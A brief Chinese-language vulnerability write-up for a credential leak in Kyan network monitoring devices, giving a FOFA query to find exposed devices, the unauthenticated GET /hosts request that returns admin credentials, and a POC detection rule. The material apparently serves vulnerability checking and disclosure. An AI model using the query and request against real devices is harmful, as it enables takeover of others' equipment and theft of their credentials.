漏洞描述
Kyan网络监控设备存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限。
fofa
app=”Kyan设计”
漏洞复现
GET /hosts HTTP/1.1
Host:
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
检测poc规则编写
params: []
name: Kyan网络监控设备hosts账号密码泄露漏洞
set: {}
rules:
- method: GET
path: /hosts
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"UserName=admin") && response.body.bcontains(b"Password=")
g